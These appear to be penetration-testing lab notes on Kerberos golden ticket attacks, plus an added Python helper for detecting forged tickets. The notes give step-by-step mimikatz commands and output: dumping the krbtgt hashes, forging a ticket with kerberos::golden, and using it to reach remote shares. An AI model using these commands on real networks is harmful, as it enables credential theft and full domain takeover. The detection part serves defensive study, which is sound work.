Golden Ticket Attacks

What is it?

  • When we compromise the krbtgt account, we own the domain

  • We can request access to any resource or system on the domain

  • A golden ticket gives complete access to every machine in the domain

Requirements for the Golden Ticket Attack

We need two pieces of information about the krbtgt account:

  1. NTLM Hash

  2. Domain SID

C:\Users\Administrator>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : MARVEL / S-1-5-21-817282392-3664699690-768258319

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : e2862946500528c91a1bc952806f1f6d
    LM   :
  Hash NTLM: e2862946500528c91a1bc952806f1f6d
    ntlm- 0: e2862946500528c91a1bc952806f1f6d
    lm  - 0: ab0c4fe79d001397eeaeabec8c6a65dc

 * Kerberos
    Default Salt : MARVEL.LOCALkrbtgt
    Credentials
      des_cbc_md5       : d391ecb5dc9e9ec7

 * Kerberos-Newer-Keys
    Default Salt : MARVEL.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 0c6a01772449ba5a73b3e9c142c0059c060cfcafa48867b8493d861917f49ff9
      aes128_hmac       (4096) : dec56d737b6bab7c96a7d8ce326d57f6
      des_cbc_md5       (4096) : d391ecb5dc9e9ec7

 * NTLM-Strong-NTOWF
    Random Value : 054bbf8dc2887cde3f761892508cb6cc

We need the SID of the domain (from the "Domain" line of the output above):

S-1-5-21-817282392-3664699690-768258319

We need the NTLM hash of the krbtgt account (the "Hash NTLM" line):

e2862946500528c91a1bc952806f1f6d

We now have both pieces of information.

Generate a golden ticket (run inside mimikatz):

mimikatz # kerberos::golden /User:Admin /domain:marvel.local /sid:S-1-5-21-817282392-3664699690-768258319 /krbtgt:e2862946500528c91a1bc952806f1f6d /id:500

Pass the Golden Ticket

Once we have the ticket, we can pass it and get command-line access to every machine in the domain.

mimikatz # misc::cmd

Now we have a command-prompt session with the golden ticket, so we can list the C$ share of another domain machine:

dir \\THEPUNISHER\C$

We can also get a command prompt on a remote machine with psexec.

We can also add a new user.
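
From the defender's side, the walkthrough above leaves two traces worth alerting on: the forged ticket names a user ("Admin") that does not match the real account behind RID 500, and it was built from the krbtgt NTLM/RC4 key even though the dump shows the account also holds AES keys. The following detection helper is an added example, not code from these notes or from mimikatz; the directory snapshot, the joined 4769/4624 record layout and the event values are constructed sample data, and correlating the two events into one record is assumed to have been done upstream.

```python
"""Flag logon records that carry golden-ticket indicators (added example).

A record joins fields from a 4769 service-ticket event (Ticket Encryption
Type) and the 4624 logon it produced on the target (Security ID, Account
Name from the ticket's PAC). All values below are constructed samples."""
from dataclasses import dataclass

RC4_HMAC = 0x17  # Ticket Encryption Type value for RC4-HMAC in event 4769

# Constructed directory snapshot: objectSid -> sAMAccountName.
DIRECTORY = {
    "S-1-5-21-817282392-3664699690-768258319-500": "Administrator",
    "S-1-5-21-817282392-3664699690-768258319-1104": "fcastle",
}


@dataclass
class LogonRecord:
    account_name: str  # Account Name carried in the ticket's PAC
    account_sid: str   # Security ID string from the 4624 event XML
    enc_type: int      # Ticket Encryption Type from the matching 4769
    target: str        # host that recorded the logon


def golden_ticket_indicators(rec, directory=DIRECTORY, aes_in_use=True):
    """Return the reasons this record looks like a forged TGT was used."""
    reasons = []
    known_name = directory.get(rec.account_sid)
    if known_name is None:
        reasons.append(f"SID {rec.account_sid} not found in directory")
    elif known_name.lower() != rec.account_name.lower():
        # A forged PAC pairs a freely chosen name with a copied RID.
        reasons.append(f"name {rec.account_name!r} does not match "
                       f"{known_name!r} for SID {rec.account_sid}")
    if aes_in_use and rec.enc_type == RC4_HMAC:
        reasons.append("RC4 ticket although krbtgt holds AES keys")
    return reasons


if __name__ == "__main__":
    sid = "S-1-5-21-817282392-3664699690-768258319-"
    forged = LogonRecord("Admin", sid + "500", RC4_HMAC, "THEPUNISHER")
    normal = LogonRecord("fcastle", sid + "1104", 0x12, "THEPUNISHER")
    for rec in (forged, normal):
        print(rec.target, rec.account_name,
              golden_ticket_indicators(rec) or ["clean"])
```

The name/SID check is the durable one: it still fires after the krbtgt key is rotated, whereas the RC4 check only helps in a domain where AES tickets are the norm.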
